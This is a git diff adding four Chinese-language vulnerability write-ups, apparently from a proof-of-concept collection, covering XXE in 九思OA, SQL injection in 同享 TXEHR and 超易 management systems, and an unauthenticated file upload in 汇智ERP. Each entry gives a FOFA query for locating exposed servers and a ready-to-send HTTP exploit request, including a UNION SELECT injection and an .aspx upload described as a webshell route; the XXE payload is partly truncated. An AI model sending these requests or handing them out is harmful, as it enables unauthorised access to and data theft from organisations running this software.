diff --git a/九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md b/九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md new file mode 100644 index 0000000..20d5896 --- /dev/null +++ b/九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md @@ -0,0 +1,25 @@ +# 九思OA接口WebServiceProxy存在XXE漏洞 + +九思OA接口isoaNebServiceProxy 存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据。 + +## fofa + +```yaml +body="/jsoa/login.jsp" +``` + +## poc + +```java +POST /jsoa/WebServiceProxy HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 +Content-Type: application/x-www-form-urlencoded +Connection: close + + %remote;]> +``` + diff --git a/同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md b/同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..d4fcaef --- /dev/null +++ b/同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞 + +同享TXEHR人力管理管理平台SFZService.asmx存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +body="/Assistant/Default.aspx" +``` + +## poc + +```java +POST /Service/SFZService.asmx +HOST: +SOAPAction: http://tempuri.org/GetEmployeeBySFZ +Content-Type: text/xml;charset=UTF-8 + +\n \n \n\ + \ \n \n 1'\ + \ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(81)+CHAR(78)+CHAR(79)+CHAR(122)+CHAR(106)+CHAR(69)+CHAR(103)+CHAR(80)+CHAR(87)+CHAR(89)+CHAR(117)+CHAR(97)+CHAR(104)+CHAR(105)+CHAR(74)+CHAR(109)+CHAR(80)+CHAR(68)+CHAR(74)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(103)+CHAR(90)+CHAR(68)+CHAR(105)+CHAR(114)+CHAR(107)+CHAR(69)+CHAR(86)+CHAR(121)+CHAR(76)+CHAR(69)+CHAR(115)+CHAR(102)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(101)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\ + \ hExp\n \n \n +``` + diff --git a/汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md b/汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md new file mode 100644 index 0000000..3d62979 --- /dev/null +++ b/汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md @@ -0,0 +1,62 @@ +# 汇智ERP系统Upload.aspx存在文件上传漏洞 + +汇智企业资源管理系统Upload.aspx存在文件上传漏洞,攻击者可未授权上传webshell木马文件获取服务器权限。 + +## fofa + +```yaml +icon_hash="-642591392" +``` + +## poc + +```java +POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1 +Host: +Content-Length: 1033 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="__VIEWSTATE" + +/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" + +573D6CFB +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfile_Input" + + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfile_upload"; filename="1" +Content-Type: image/jpeg + + + + + ASP.NET Web Forms Example + + + <%@ Page Language="C#" %> + <% Response.Write("hello,world"); %> + + +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="upfilename" + +2.aspx +------WebKitFormBoundaryLkkAXATqVKBHZ8zk +Content-Disposition: form-data; name="dnpostmethodname" + +uploadfile +------WebKitFormBoundaryLkkAXATqVKBHZ8zk-- +``` + diff --git a/超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md b/超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..a4ead40 --- /dev/null +++ b/超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 超易企业管理系统Login.ashx存在SQL注入漏洞 + +超易企业管理系统存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +"超易企业管理系统" +``` + +## poc + +```java +POST /ajax/Login.ashx?Date=%271721821198459%27 HTTP/1.1 +Host: +Content-Length: 92 +Accept: text/plain, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +username=admin*&password=admin123&loginguid=&logintype=pc +``` +